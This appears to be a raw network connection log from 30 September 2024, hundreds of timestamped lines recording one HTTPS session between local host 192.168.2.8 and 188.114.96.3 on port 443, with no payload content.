Sep 30, 2024 18:19:12.088308096 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.088938951 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.089031935 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.089046001 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.089051962 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.089076042 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.089145899 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.089206934 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.089214087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.089314938 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.089915037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.089996099 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.090059996 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.090122938 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.090183020 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.090266943 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.173587084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.173635006 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.173773050 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.173773050 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.173784018 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.173810959 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.173846960 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.173846960 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.173856020 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174006939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174071074 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174113035 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.174113035 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.174119949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174336910 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174458981 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.174468040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174508095 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.174552917 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174612045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.174674034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174735069 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.174803019 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.174856901 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.175203085 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.175260067 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.175317049 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.175386906 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.175517082 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.175549984 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.175578117 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.175584078 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.175594091 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.175602913 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.175712109 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.176140070 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176192045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.176328897 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176362991 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176381111 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.176387072 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176405907 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.176531076 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176558018 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176594019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.176600933 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.176618099 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.177201033 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.177232027 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.177277088 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.177277088 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.177284002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.177388906 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.177512884 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.177519083 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.177541971 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.177587986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.177587986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.177593946 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.178117990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.178286076 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.178293943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.178374052 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261043072 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261086941 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261183023 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261198044 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261245966 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261245966 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261291981 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261342049 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261385918 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261385918 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261392117 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261734009 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261749029 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.261944056 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.261950970 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.262274981 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.262293100 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.262382984 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.262391090 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.262411118 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.267914057 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.267921925 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.267991066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.267997980 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.268270016 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.268287897 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.268362045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.268362045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.268369913 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.268834114 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.268847942 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.268928051 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.268934011 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.269198895 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.269212961 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.269295931 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.269304037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.321444988 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.349066019 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.349088907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.349205017 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.349215984 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.349260092 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.349526882 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.349541903 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.349589109 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.349596024 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.349631071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.349657059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350105047 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350122929 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350169897 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350176096 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350208998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350248098 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350483894 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350501060 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350563049 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350568056 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350600958 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350600958 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350836039 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350851059 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350899935 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350905895 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.350934029 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.350934029 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.351464987 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.351481915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.351557970 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.351557970 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.351564884 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.351646900 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.351948977 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.351963997 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.352044106 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.352051020 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.352118969 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.352461100 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.352475882 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.352539062 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.352545023 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.352646112 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.436269045 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.436294079 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.436469078 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.436479092 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.436531067 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.437666893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.437685013 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.437769890 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.437778950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.437834024 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.437846899 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.437863111 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.437917948 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.437923908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.437963963 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.438383102 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.438399076 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.438483953 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.438489914 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.438539982 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.438972950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.438990116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.439053059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.439059019 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.439080954 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.439080954 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.439677954 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.439692974 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.439788103 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.439795017 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.439889908 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.440450907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.440466881 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.440531969 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.440537930 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.440591097 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.440620899 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.440639019 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.440695047 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.440702915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.440711975 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.440783978 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.534320116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.534339905 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.534558058 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.534569979 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.534637928 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.536736965 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.536753893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.536827087 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.536837101 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.536884069 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.537055969 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.537070036 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.537137985 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.537143946 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.537195921 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.537736893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.537755966 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.537811995 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.537817955 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.537879944 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.538105011 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.538120031 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.538175106 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.538182020 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.538319111 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.538727999 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.538746119 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.538817883 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.538825035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.538877010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.539299011 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.539314032 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.539367914 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.539374113 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.539417028 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.539747953 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.539767027 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.539819956 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.539829969 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.539874077 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.622056007 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.622077942 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.622158051 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.622168064 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.622225046 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.625612974 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.625633001 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.625731945 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.625739098 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.625785112 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.626399040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.626419067 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.626528025 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.626535892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.626578093 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.626837969 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.626857996 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.626914978 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.626921892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.626950026 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.626950026 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.626987934 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.627006054 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.627058983 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.627069950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.627197027 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.627752066 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.627772093 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.627898932 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.627904892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.627959967 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.628293037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.628309965 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.628366947 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.628376007 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.628420115 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.628794909 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.628819942 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.628860950 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.628873110 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.628902912 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.628902912 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.710022926 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.710042953 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.710196018 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.710206985 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.710258961 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.712502003 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.712521076 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.712569952 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.712583065 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.712624073 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.713387966 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.713408947 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.713452101 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.713459969 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.713521957 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.714673042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.714690924 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.714730978 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.714737892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.714776039 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.714776039 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.715677023 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.715693951 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.715786934 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.715794086 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.715847015 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.716046095 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716062069 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716140032 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.716146946 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716233969 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716253042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716264009 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.716270924 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716295004 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.716325045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.716597080 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716614962 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716677904 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.716684103 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.716805935 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.797096014 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.797121048 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.797251940 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.797265053 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.797322035 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.800873995 CEST	443	49706	188.114.96.3	192.168.2.8
